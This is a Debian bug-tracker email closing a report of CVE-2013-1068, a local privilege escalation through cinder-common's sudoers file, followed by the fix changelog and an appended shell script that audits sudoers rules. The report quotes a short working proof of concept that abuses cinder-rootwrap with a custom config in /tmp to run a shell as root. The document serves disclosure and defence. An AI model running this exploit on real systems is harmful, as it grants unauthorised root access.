Your message dated Thu, 03 Jul 2014 13:33:49 +0000
with message-id <e1x2h93-00010x...@franck.debian.org>
and subject line Bug#753585: fixed in cinder 2014.1.1-3
has caused the Debian Bug report #753585,
regarding cinder: CVE-2013-1068: local privilege escalation
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
753585: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=753585
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Package: cinder-common
Version: 2014.1.1-2
Severity: grave
Tags: security, confirmed

After installing cinder-common, the file /etc/sudoers.d/cinder-common is
created. If /etc/sudoers contains "#includedir /etc/sudoers.d", cinder is
vulnerable to CVE-2013-1068, a local privilege escalation. The vulnerability
does not need a working OpenStack installation. If I am correct, OpenStack does
not work without the includedir configuration, so it might usually be enabled
in OpenStack instances.

PoC: https://bugs.launchpad.net/ubuntu/+source/nova/+bug/1185019

"""
echo [DEFAULT] >/tmp/my-rootwrap.conf
echo filters_path=/tmp/my-filters.d >>/tmp/my-rootwrap.conf
mkdir /tmp/my-filters.d
echo [Filters] >/tmp/my-filters.d/my.filters
echo my-shell: CommandFilter, /bin/sh, root >>/tmp/my-filters.d/my.filters
sudo -n cinder-rootwrap /tmp/my-rootwrap.conf sh -c id
"""

---
Henri Salo


--- End Message ---
--- Begin Message ---
Source: cinder
Source-Version: 2014.1.1-3

We believe that the bug you reported is fixed in the latest version of
cinder, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 753...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Thomas Goirand <z...@debian.org> (supplier of updated cinder package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Format: 1.8
Date: Thu, 03 Jul 2014 21:14:40 +0800
Source: cinder
Binary: python-cinder cinder-common cinder-api cinder-volume cinder-scheduler cinder-backup
Architecture: source all
Version: 2014.1.1-3
Distribution: unstable
Urgency: high
Maintainer: PKG OpenStack <openstack-de...@lists.alioth.debian.org>
Changed-By: Thomas Goirand <z...@debian.org>
Description:
 cinder-api - OpenStack block storage system - API server
 cinder-backup - OpenStack block storage system - Backup server
 cinder-common - OpenStack block storage system - common files
 cinder-scheduler - OpenStack block storage system - Scheduler server
 cinder-volume - OpenStack block storage system - Volume server
 python-cinder - OpenStack block storage system - Python libraries
Closes: 753585
Changes:
 cinder (2014.1.1-3) unstable; urgency=high
 .
   * CVE-2013-1068: fixed debian/cinder-common.sudoers (Closes: #753585).

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
-----END PGP SIGNATURE-----

--- End Message ---
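
An added audit sketch, not part of the original report or of the Debian package: it flags sudoers rules that run a *-rootwrap command without fixing the configuration file argument, which is the condition the PoC in the report depends on. The sample rules and the /etc/cinder/rootwrap.conf path are constructed assumptions; the page does not show the contents of debian/cinder-common.sudoers.

```shell
#!/bin/sh
# Print "unpinned", "pinned" or "n/a" for one sudoers line. "unpinned" means
# the caller picks rootwrap's first argument (its config file). Handles direct
# rules only, not Cmnd_Alias indirection.
rootwrap_rule_status() {
    printf '%s\n' "$1" | awk '
        /^[ \t]*#/ { print "n/a"; exit }       # comment or #includedir
        {
            for (i = 1; i <= NF; i++) {
                if ($i ~ /^\/.*-rootwrap,?$/) {
                    # sudoers: a command with no argument list accepts any arguments
                    if (i == NF || $i ~ /,$/) { print "unpinned"; exit }
                    arg = $(i + 1)
                    # pinned only if the first argument is a literal absolute path
                    if (arg ~ /^\// && arg !~ /[*?]/) print "pinned"
                    else print "unpinned"
                    exit
                }
            }
            print "n/a"
        }'
}

# Scan every file in a sudoers include directory, print the offending rules,
# and return 1 if any were found (0 otherwise).
audit_sudoers_dir() {
    found=0
    for f in "$1"/*; do
        [ -f "$f" ] || continue
        while IFS= read -r line || [ -n "$line" ]; do
            if [ "$(rootwrap_rule_status "$line")" = unpinned ]; then
                printf '%s: %s\n' "$f" "$line"
                found=1
            fi
        done < "$f"
    done
    return "$found"
}

# Constructed sample fragments (assumed rule shapes, not the package's files).
demo_dir=$(mktemp -d)
echo 'cinder ALL = (root) NOPASSWD: /usr/bin/cinder-rootwrap' > "$demo_dir/before"
echo 'cinder ALL = (root) NOPASSWD: /usr/bin/cinder-rootwrap /etc/cinder/rootwrap.conf *' > "$demo_dir/after"
audit_sudoers_dir "$demo_dir" || echo "unpinned rootwrap rule(s) found"
rm -rf "$demo_dir"
```

On a real host the directory to pass is /etc/sudoers.d; a pinned rule is only as strong as the permissions on the configuration file and filter directory it names.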
